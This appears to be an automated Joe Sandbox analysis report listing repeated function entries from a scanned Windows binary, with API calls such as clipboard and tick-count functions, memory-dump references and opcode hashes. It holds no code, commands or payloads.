Function 0000000140037BD0 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400570B0: SendMessageW.USER32(?,0000000140037B5E), ref: 0000000140057259

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
String ID:
API String ID: 1853169715-0
Opcode ID: 048cce2ea624406cc66437a82a6b6249a9245b19766e315293c706e7cbf3660c
Instruction ID: 9bbd258bbc1b3becc906f99d0b451fcc380179e839822b7fe0307e120255447e
Opcode Fuzzy Hash: 048cce2ea624406cc66437a82a6b6249a9245b19766e315293c706e7cbf3660c
Instruction Fuzzy Hash: B3816032605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037BDF Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400570B0: SendMessageW.USER32(?,0000000140037B5E), ref: 0000000140057259

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekSendUnlock
String ID:
API String ID: 1853169715-0
Opcode ID: 461afedf34f24690d3a97965ae2f15f6dfc15f4607cb3e94bfc7bcb18700a9b9
Instruction ID: eb3bcded1d992783570f6a940a48882ec5319b43223a39d04989f7bde91d8619
Opcode Fuzzy Hash: 461afedf34f24690d3a97965ae2f15f6dfc15f4607cb3e94bfc7bcb18700a9b9
Instruction Fuzzy Hash: D7816032605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035FB5 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Part of subcall function 0000000140015020: CloseHandle.KERNEL32 ref: 00000001400150EE
Part of subcall function 0000000140015020: CreateMutexW.KERNEL32 ref: 00000001400150FF
Part of subcall function 0000000140015020: GetLastError.KERNEL32 ref: 0000000140015108
Part of subcall function 0000000140015020: GetWindowThreadProcessId.USER32 ref: 00000001400151C4

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
String ID:
API String ID: 4284707085-0
Opcode ID: b4873df13cb317e9f7b85176b197c5155c26bd37753a97ee1f5c57f8f858808e
Instruction ID: 14cabf51d64cc97ca339fb7776e15010acd9ca542f70fc6da3cec6a5cdabcea9
Opcode Fuzzy Hash: b4873df13cb317e9f7b85176b197c5155c26bd37753a97ee1f5c57f8f858808e
Instruction Fuzzy Hash: 2C816F32605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5947AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035FD9 Relevance: 9.2, APIs: 6, Instructions: 171windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Part of subcall function 0000000140015020: CloseHandle.KERNEL32 ref: 00000001400150EE
Part of subcall function 0000000140015020: CreateMutexW.KERNEL32 ref: 00000001400150FF
Part of subcall function 0000000140015020: GetLastError.KERNEL32 ref: 0000000140015108
Part of subcall function 0000000140015020: GetWindowThreadProcessId.USER32 ref: 00000001400151C4

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
String ID:
API String ID: 4284707085-0
Opcode ID: 8c19bc278d7dff4d864a124e17aeaaeec6cca093cc513ef1fa12be45eab97061
Instruction ID: a7055b76a897c83dc388eca8623ee82bb08526d01c776ebc76d6326a671c631b
Opcode Fuzzy Hash: 8c19bc278d7dff4d864a124e17aeaaeec6cca093cc513ef1fa12be45eab97061
Instruction Fuzzy Hash: A4816F32605B4086FB6B8B27E8947EA37A1F74DBE4F540116EB5947AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038545 Relevance: 9.2, APIs: 6, Instructions: 170windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 9db17cfc029a1d9e455f62c7162e2f0e37d34ba8bc73450ec7a1a60edd1777d7
Instruction ID: 20a4d9a77831b4051384fc8f598b355a3d8bbcaf9ffa1d3d018c2b1f6fbfd02e
Opcode Fuzzy Hash: 9db17cfc029a1d9e455f62c7162e2f0e37d34ba8bc73450ec7a1a60edd1777d7
Instruction Fuzzy Hash: A6816132605B4086FB6B8B27E8847EA77A1F74DBE4F540116EB99476F5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003675A Relevance: 9.2, APIs: 6, Instructions: 170windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 2cab56a4a519311db7c61c73b245d214bc64a600d3dc5e231742c3ef771d6dd7
Instruction ID: e3e2c6f410881c48b301771b73636cffdad32ec2a4b1032f737b5e02fa8f4c3d
Opcode Fuzzy Hash: 2cab56a4a519311db7c61c73b245d214bc64a600d3dc5e231742c3ef771d6dd7
Instruction Fuzzy Hash: BB816F32205B4486FB6B8B27E8847EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140035D79 Relevance: 9.2, APIs: 6, Instructions: 170windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 57e1c047e5c44e4425460a1b8dbbf41da31fd1af2930cb6ffce9a84bdccad04c
Instruction ID: b0e548cd495171c6ca5094691b6b95767a7dc720f30d04e99c7db22c2eb9a034
Opcode Fuzzy Hash: 57e1c047e5c44e4425460a1b8dbbf41da31fd1af2930cb6ffce9a84bdccad04c
Instruction Fuzzy Hash: 65816F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037F7A Relevance: 9.2, APIs: 6, Instructions: 170windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400476A0: PostMessageW.USER32 ref: 0000000140047729

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Message$ClipboardCloseGlobalPeekPostUnlock
String ID:
API String ID: 2416748954-0
Opcode ID: 470618b3187763793301ddd5f54f17b9c5cde879357a5bf722641e26f6cdd791
Instruction ID: 827f9a73b1c3767e86ac2efcaef49972a217e36356066d334de93e4c410f49a2
Opcode Fuzzy Hash: 470618b3187763793301ddd5f54f17b9c5cde879357a5bf722641e26f6cdd791
Instruction Fuzzy Hash: C0816F32605B4486FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400386B1 Relevance: 9.2, APIs: 6, Instructions: 167windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: a90410ff8d39cf80ff69b6734ce75fef65acd44867dfaa717b3925790bf672d2
Instruction ID: d9d9c16f61d61aaaa84c8dc6fee8d184c7f9762826055b3f28ef1abfb9efc621
Opcode Fuzzy Hash: a90410ff8d39cf80ff69b6734ce75fef65acd44867dfaa717b3925790bf672d2
Instruction Fuzzy Hash: CA817F32205B4486FB6B8B27E8947EA37A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400381FB Relevance: 9.2, APIs: 6, Instructions: 166windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: e25067a6fa8cd6921889d85f3618514946d5b3df6d95472a3486f240b717c31c
Instruction ID: 849278b426213ebd2f9a679536a996548d653b38d201c7a53e8337841403b6ab
Opcode Fuzzy Hash: e25067a6fa8cd6921889d85f3618514946d5b3df6d95472a3486f240b717c31c
Instruction Fuzzy Hash: 38817132605B4086FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003820B Relevance: 9.2, APIs: 6, Instructions: 166windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c184325b0f37b7686610e3fafaf558c35b3206c8702a367094bd4fefa53ad55f
Instruction ID: 7c4315c5d162bede6514ba8901c129e929458227dcb60f9dd2867e06a9bcd96c
Opcode Fuzzy Hash: c184325b0f37b7686610e3fafaf558c35b3206c8702a367094bd4fefa53ad55f
Instruction Fuzzy Hash: 79817032605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038214 Relevance: 9.2, APIs: 6, Instructions: 166windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 48b87250f5e2e36cc3af9400c15ece38dc7aaa5379fef70e119143aeee17b791
Instruction ID: a6ea11725852d2e0c7fb9417f8327e29c8cf2d56b4dcfaf5d162a97e8c158b86
Opcode Fuzzy Hash: 48b87250f5e2e36cc3af9400c15ece38dc7aaa5379fef70e119143aeee17b791
Instruction Fuzzy Hash: D0817132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400381EE Relevance: 9.2, APIs: 6, Instructions: 165windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 4fe8f721cdd2f73db9450b442155e2993d3a131e671ca4706e5450aa3e3427d6
Instruction ID: 78be7d9febec830ee7ba95c005fa3c5a84720aca12a60700c1bd8fdb57abf835
Opcode Fuzzy Hash: 4fe8f721cdd2f73db9450b442155e2993d3a131e671ca4706e5450aa3e3427d6
Instruction Fuzzy Hash: A1817132605B4086FB6B8B27E8947EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003861C Relevance: 9.2, APIs: 6, Instructions: 165windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 275b81ef885c79bba315ce0c3309caae845de8fc81a15e3a500320c6e4bbe5df
Instruction ID: dfa7523ab7166bfbfd9b91a4999bd53b5a0d362c5019a04ee368327ba5a32274
Opcode Fuzzy Hash: 275b81ef885c79bba315ce0c3309caae845de8fc81a15e3a500320c6e4bbe5df
Instruction Fuzzy Hash: 64817032605B4086FB6B8B27E8847EA77A1F74DBE4F540116EB5987AF5DB38C881C700

Uniqueness

Uniqueness Score: -1.00%

